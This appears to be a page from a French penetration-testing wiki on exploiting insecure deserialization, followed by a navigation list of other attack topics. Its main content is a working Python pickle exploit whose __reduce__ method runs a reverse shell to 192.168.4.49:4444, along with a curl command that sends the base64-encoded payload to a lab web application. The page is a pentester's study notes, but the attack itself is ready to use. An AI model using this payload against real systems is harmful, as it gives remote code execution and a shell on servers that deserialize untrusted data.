[Exploitation/Web] Déserialisation

Introduction

Parfois, le serveur web a besoin d'enregistrer des données dans un fichier pour les recharger à un autre moment. Il fait donc de la sérialisation pour enregistrer un ou plusieurs objets (POO) puis de la déserialisation pour reconstruire les objets à partir du fichier de sauvegarde. Cependant si cette déserialisation n'est pas sécurisée et que vous contrôler ce que vous pouvez mettre dans les objets, vous pourriez injecter du code malveillant qui sera exécuté lors de la déserialisation.

Manuel

Dans l'exemple ci-dessous on génère un chaîne en base64 qui sera donné à l'application puis lors de la déserialisation, le reverse shell sera exécuté :

import pickle, base64, os

class ReverseShell:
    def __reduce__(self):
        cmd = ('python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
               's.connect(("192.168.4.49",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);'
               'os.dup2(s.fileno(),2);import pty; pty.spawn("sh")\'')
        return (os.system, (cmd,))

payload = pickle.dumps(ReverseShell())
b64_payload = base64.b64encode(payload).decode()

print(b64_payload)

On balance le payload à l'application :

curl -X POST http://192.168.4.7:8003/decode -H 'Content-Type: application/json' -d '{"text": "gASV9gAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjNtweXRob24zIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC40LjQ5Iiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKSeUhZRSlC4="}'

[Exploitation/AD] Cheat-sheet

[Exploitation/AD] Kerberos

[Exploitation/AD] Initial Access

[Exploitation/AD] Password spraying et brute force

[Exploitation/AD] Credentials Harvesting

[Exploitation/AD] Exécution de commande à distance

[Exploitation/Windows] Récupération base SAM locale

[Exploitation/Windows] Reset mot de passe admin local

[Exploitation/Windows] Ouvrir un shell NT authorité système

[Exploitation/Windows] Connexion RDP

[Exploitation/Windows] Eternal Blue

[Exploitation/Windows] Antivirus/EDR Evasion

[Exploitation/Windows] Keylogger

[Exploitation/Windows] Living Off the Land

[Exploitation/Windows] Monitoring evasion

[Exploitation/Wifi] Drivers AWUS1900

[Exploitation/WiFi] Aircrack-ng

[Exploitation/Wifi] Wifite

[Exploitation/Wifi] HackrfOne

[Exploitation/Réseau] Metasploit

[Exploitation/Réseau] Exploit-DB & Searchsploit

[Exploitation/Réseau] Netcat

[Exploitation/Réseau] Pwncat

[Exploitation/Réseau] ICMP Reverse shell

[Exploitation/Réseau] Data exfiltration

[Exploitation/Réseau] IDS/IPS Evasion

[Exploitation/Réseau] Reverse shell

[Exploitation/Réseau] Sliver C2

[Exploitation/Réseau] Transfert de fichiers

[Exploitation/Web] BurpSuite

[Exploitation/Web] XSS

[Exploitation/Web] SQL injection

[Exploitation/Web] CSRF

[Exploitation/Web] File upload

[Exploitation/Web] LFI / RFI

[Exploitation/Web] Bypass 403

[Exploitation/Web] IP spoofing

[Exploitation/Web] CI/CD

[Exploitation/Web] Encodage

[Exploitation/Web] JWT

[Exploitation/Web] SSRF

[Exploitation/Web] SSTI

[Exploitation/Web] XSLT

[Exploitation/Web] Déserialisation

[Exploitation/Cracking] Mots de passe

[Exploitation/Cracking] Hash

[Cracking] Wordlists

[Exploitation/Cracking] Rainbow Tables

[Exploitation/Cracking] Wifi

[Exploitation/Stegano] StegHide

[Exploitation/Stegano] Stegseek

[Exploitation/Stegano] Strings

[Exploitation/Stegano] Exiftool

[Exploitation/Stegano] Aperi'Solve

[Exploitation/Stegano] PixRecovery & GHex

[Exploitation/Python] Payloads

[Exploitation/Web] Déserialisation

Introduction

Manuel

No Comments